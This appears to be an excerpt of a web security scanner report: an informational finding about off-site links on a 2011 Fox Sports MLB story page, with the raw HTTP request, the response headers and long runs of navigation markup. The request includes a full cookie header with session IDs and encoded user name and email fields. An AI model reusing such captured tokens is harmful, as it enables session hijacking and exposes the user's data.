<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsohio.com/01/03/11/Brewers-to-be-top-challenge-to-Reds-in-2/landing_reds.html?blockID=383908&amp;feedID=3724' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Big cheese');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Big cheese') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<!-- MLB - Story Page Promo -->

<a href="http://www.whatifsports.com/x.asp?r=678106&u=mlb-l">Play SimLeague Baseball ... Where Baseball History Comes Alive</a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...


   
<a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?">Buzz: Soriano is best free agent left, but who wants him?</a>
...[SNIP]...


   
        <a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://foxsports.seenon.com/?v=fox-sports_mlb&amp;ecid=PRF-SM-510012&amp;PA=FoxSportsWSChampsGiants_300X90 "><img src="http://static.foxsports.com/content/fscom/img/2010/11/01/world_series_300x90_01_20101101222146_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://www.bing.com/news/search?q=elizabeth+edwards+will&go=&form=QBNR&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="DUI charge for Jaime Pressly" href="http://specials.msn.com/A-List/Entertainment/DUI-charge-for-Pressly.aspx?cp-documentid=27141923&ocid=xnetr4-3">DUI charge for Jaime Pressly</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.14. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234107
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Sat, 08 Jan 2011 00:59:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
